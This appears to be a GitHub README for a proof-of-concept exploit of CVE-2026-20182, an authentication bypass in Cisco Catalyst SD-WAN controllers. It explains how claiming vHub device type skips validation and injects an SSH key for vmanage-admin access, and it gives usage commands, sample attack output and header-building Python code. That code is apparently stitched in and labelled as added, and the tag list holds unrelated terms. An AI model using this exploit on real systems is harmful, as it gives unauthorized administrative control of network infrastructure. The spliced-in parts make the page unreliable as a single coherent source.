portbuster1337/CVE-2026-20182
GitHub: portbuster1337/CVE-2026-20182
High-impact exploit tool for the Cisco Catalyst SD-WAN Controller authentication bypass vulnerability; fully bypasses authentication to obtain SSH/NETCONF access.
Stars: 2 | Forks: 0
# CVE-2026-20182: Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass
Proof-of-concept exploit for **CVE-2026-20182**, a critical (CVSS 10.0) authentication bypass in the vdaemon DTLS service (UDP/12346) on Cisco Catalyst SD-WAN Controller (vSmart) and Manager (vManage).
**Disclosed:** 14 May 2026, by Rapid7 (Stephen Fewer & Jonah Burgess)
**CISA KEV:** added 14 May 2026 (Emergency Directive 26-03)
**CVSS:** 10.0, CWE-287: Improper Authentication
## Vulnerability details
The vdaemon service authenticates control-plane peers with a multi-stage DTLS handshake. `vbond_proc_challenge_ack()` implements certificate validation per device type, but device type 2 (vHub) **has no validation code path**. Sending a CHALLENGE_ACK with `device_type=2` makes the function fall through every conditional and unconditionally set `peer->authenticated` to 1.
No valid credentials, no CA-signed certificate and no knowledge of the SD-WAN deployment are required.
## What the exploit does
1. Establishes a DTLS 1.2 connection to the target's vdaemon service (UDP/12346)
2. Receives the CHALLENGE message (msg_type=8)
3. Sends a CHALLENGE_ACK claiming to be a **vHub** (device_type=2); the peer is marked as authenticated
4. Sends HELLO (msg_type=5); the peer transitions to the UP state
5. Injects an SSH public key into `/home/vmanage-admin/.ssh/authorized_keys` via `MSG_VMANAGE_TO_PEER` (msg_type=14)
6. Grants NETCONF access (over SSH, TCP/830) or SSH access (TCP/22) as `vmanage-admin`
## Usage
```
python3 cve-2026-20182.py -t TARGET [options]
```
### Options
| Argument | Description |
|----------|-------------|
| `-t`, `--target` | Target IP address or hostname |
| `--port` | vdaemon UDP port (default: 12346) |
| `--key-file` | Path to an existing SSH public key to inject (optional) |
| `--netconf` | Verify the exploit succeeded by connecting to NETCONF over SSH |
### Examples
```
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100
# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
```
### Output
```
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 vmanage-admin@192.168.1.100
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa vmanage-admin@192.168.1.100
```
## Affected versions
| Release | Fixed release |
|---------|---------------|
| < 20.9 | Migrate to a supported release |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
## Research references
- **Rapid7 (original disclosure):** [CVE-2026-20182: Critical Authentication Bypass in Cisco Catalyst SD-WAN Controller](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/): full technical analysis, decompiled code and protocol details by Stephen Fewer and Jonah Burgess
- **Cisco security advisory:** [cisco-sa-sdwan-rpa2-v69WY2SW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW): advisory listing the fixed releases
- **CISA KEV:** [CVE-2026-20182](https://www.cisa.gov/known-exploited-vulnerabilities-catalog): Emergency Directive 26-03 (remediate by 17 May 2026)
- **NVD:** [CVE-2026-20182](https://nvd.nist.gov/vuln/detail/CVE-2026-20182): National Vulnerability Database entry
- **Rapid7 Metasploit module:** `cisco_sdwan_vhub_auth_bypass`, an auxiliary module in the Metasploit Framework
- **BleepingComputer:** [Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks](https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-critical-sd-wan-flaw-exploited-in-zero-day-attacks/)
- **Tenable:** [FAQ about the continued exploitation of Cisco Catalyst SD-WAN vulnerabilities](https://www.tenable.com/blog/faq-about-the-continued-exploitation-of-cisco-catalyst-sd-wan-vulnerabilities-uat-8616)
- **Cisco Talos:** threat actor UAT-8616 confirmed exploiting this vulnerability in the wild
## Technical details
The vdaemon protocol header is 12 bytes:
| Offset | Size | Field | Description |
|--------|------|-------|-------------|
| 0 | 1 | msg_type | low nibble = message type, high nibble = version |
| 1 | 1 | device_info | high nibble = device type, low nibble = flags |
| 2 | 1 | flags | standard value 0xA0 |
| 3 | 1 | padding | always 0x00 |
| 4-7 | 4 | domain_id | big-endian uint32 |
| 8-11 | 4 | site_id | big-endian uint32 |
Device types: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
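The following is an added example, not code from this repository: a Python encoder/decoder for the 12-byte header laid out above, which also shows how the HELLO (msg_type=5) header of the flow described earlier is built when the sender claims to be a vHub. The `version` and device-flag nibble values, the `domain_id`/`site_id` values, the sample CHALLENGE bytes and the helper name `hello_as_vhub` are assumptions or constructed for illustration; the page does not give the CHALLENGE_ACK message type, so none is assumed here.

```python
import struct
from dataclasses import dataclass

# Message types and device types as listed on this page.
MSG_HELLO = 5
MSG_CHALLENGE = 8
MSG_VMANAGE_TO_PEER = 14
DEVICE_TYPES = {1: "vEdge", 2: "vHub", 3: "vSmart", 4: "vBond", 5: "vManage"}
VHUB = 2  # the device type with no validation path in vbond_proc_challenge_ack()

HEADER_LEN = 12
_HEADER_FMT = ">BBBBII"  # byte0, byte1, flags, padding, domain_id, site_id (big-endian)


@dataclass
class VdaemonHeader:
    msg_type: int           # byte 0, low nibble
    device_type: int        # byte 1, high nibble
    version: int = 0        # byte 0, high nibble (value assumed; the page does not state it)
    device_flags: int = 0   # byte 1, low nibble (value assumed)
    flags: int = 0xA0       # byte 2, "standard value 0xA0"
    domain_id: int = 1      # bytes 4-7 (sample value)
    site_id: int = 1        # bytes 8-11 (sample value)

    def pack(self) -> bytes:
        """Serialise to the 12-byte wire header; rejects values that overflow a nibble."""
        for name, val in (("msg_type", self.msg_type), ("version", self.version),
                          ("device_type", self.device_type), ("device_flags", self.device_flags)):
            if not 0 <= val <= 0xF:
                raise ValueError(f"{name}={val} does not fit in 4 bits")
        byte0 = (self.version << 4) | self.msg_type
        byte1 = (self.device_type << 4) | self.device_flags
        return struct.pack(_HEADER_FMT, byte0, byte1, self.flags, 0x00,
                           self.domain_id, self.site_id)

    @classmethod
    def unpack(cls, data: bytes) -> "VdaemonHeader":
        """Parse the first 12 bytes of a vdaemon message; any trailing payload is ignored."""
        if len(data) < HEADER_LEN:
            raise ValueError(f"need {HEADER_LEN} header bytes, got {len(data)}")
        b0, b1, flags, padding, domain_id, site_id = struct.unpack(_HEADER_FMT, data[:HEADER_LEN])
        if padding != 0x00:
            raise ValueError(f"padding byte is 0x{padding:02x}, expected 0x00")
        return cls(msg_type=b0 & 0xF, device_type=b1 >> 4, version=b0 >> 4,
                   device_flags=b1 & 0xF, flags=flags, domain_id=domain_id, site_id=site_id)

    @property
    def device_name(self) -> str:
        return DEVICE_TYPES.get(self.device_type, f"unknown({self.device_type})")

    def claims_vhub(self) -> bool:
        """True when the sender identifies as device type 2, the type the bug never validates."""
        return self.device_type == VHUB


# Constructed sample (not a real capture): a CHALLENGE (msg_type=8) header as a vSmart
# (device_type=3) would send it, domain_id=1, site_id=0, followed by a stand-in body.
SAMPLE_CHALLENGE = bytes([0x08, 0x30, 0xA0, 0x00,
                          0x00, 0x00, 0x00, 0x01,
                          0x00, 0x00, 0x00, 0x00]) + b"\x00" * 16


def hello_as_vhub(domain_id: int = 1, site_id: int = 1) -> bytes:
    """Header for the HELLO (msg_type=5) step, claiming to be a vHub (hypothetical helper)."""
    return VdaemonHeader(msg_type=MSG_HELLO, device_type=VHUB,
                         domain_id=domain_id, site_id=site_id).pack()


if __name__ == "__main__":
    hdr = VdaemonHeader.unpack(SAMPLE_CHALLENGE)
    print(f"received msg_type={hdr.msg_type} from {hdr.device_name}, "
          f"domain={hdr.domain_id} site={hdr.site_id}")
    print("HELLO header claiming vHub:", hello_as_vhub().hex())
```

`unpack` can be pointed at captured UDP/12346 payloads to log which device type each peer claims; `claims_vhub()` is the check a detection rule would key on, since a CHALLENGE_ACK asserting device type 2 is exactly what the bypass relies on.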
## Requirements
- Python 3.7+
- `openssl` CLI (used for the DTLS transport)
- `cryptography` library (`pip install cryptography`)
## Disclaimer
This exploit is intended solely for red-team engagements, penetration tests and security research with explicit written authorization. Unauthorized use is illegal.
Tags: CISA KEV, CISA project, Cisco, CVE-2026-20182, CVSS 10.0, DTLS, NETCONF, PoC, Python pentest tool, Rapid7, SD-WAN, SSH public key injection, UDP 12346, vdaemon, vHub, vManage, vSmart, critical vulnerability, memory allocation, security testing tool, emergency directive, brute force, system telemetry, programming tool, network device security, authentication bypass, device type bypass, authentication flaw, remote code execution, reverse engineering tool